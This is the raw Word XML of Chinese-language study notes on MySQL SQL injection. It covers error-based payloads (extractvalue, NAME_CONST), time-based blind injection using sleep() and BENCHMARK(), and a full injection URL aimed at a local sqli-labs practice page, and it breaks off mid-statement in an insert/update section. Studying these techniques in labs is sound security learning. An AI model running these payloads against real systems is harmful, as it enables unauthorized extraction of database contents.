          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出文章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.cnblogs.com/lcamry/articles/5509112.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39CFC9" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.extractvalue(1,concat(0x7e,(select @@version),0x7e)) se//mysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行查询和修改的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xpath </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E54089" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>5.select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9C4E7" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13339296" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于延时的注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B2E9A" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select If(1=1,0,sleep(5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA4B41" w14:textId="4287A6EE" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>If(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5DBD9" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BFE880" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00532788" w14:textId="7680F898" w:rsidR="000923F5" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc159779473"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="77475A14" w14:textId="0221A39F" w:rsidR="0088001C" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bench</w:t>
      </w:r>
      <w:r>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF4CA7" w14:textId="77777777" w:rsidR="000923F5" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378F58BB" w14:textId="77777777" w:rsidR="000923F5" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BENCHMARK()</w:t>
      </w:r>
      <w:r>
        <w:t>进行延时注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07579A78" w14:textId="601C44FC" w:rsidR="0088001C" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>http://127.0.0.1/sqllib/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BEN CHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as cur rent) as tb1--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E212F" w14:textId="5B2FAD6D" w:rsidR="000923F5" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD6587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>当结果正确的时候，运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENCODE('MSG','by 5 seconds')</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50000000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>次，会占用一段时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF19088" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B20DC99" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B16100" w14:textId="030C7AB9" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>个人总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B211D9" w14:textId="7BB9B9D4" w:rsidR="000923F5" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>直接执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> BENCHMARK(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>1000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>,ENCODE(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'hello'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'goodbye'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>只会报错未选择数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680A19C" w14:textId="2FC4A874" w:rsidR="000923F5" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>正确执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDA1F8" w14:textId="1F1AE89D" w:rsidR="0088001C" w:rsidRDefault="000923F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10000000000</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to_days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()) &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB7FA8" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B23C086" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359DC440" w14:textId="0CC79A88" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句报错盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E907D" w14:textId="653620A5" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适用于堆叠、插入等场景，且报错打印。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFD053" w14:textId="23B98669" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988A867" w14:textId="156EF30D" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该思路不唯一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B50CA" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1279B898" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`security`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`uagents`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`uagent`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
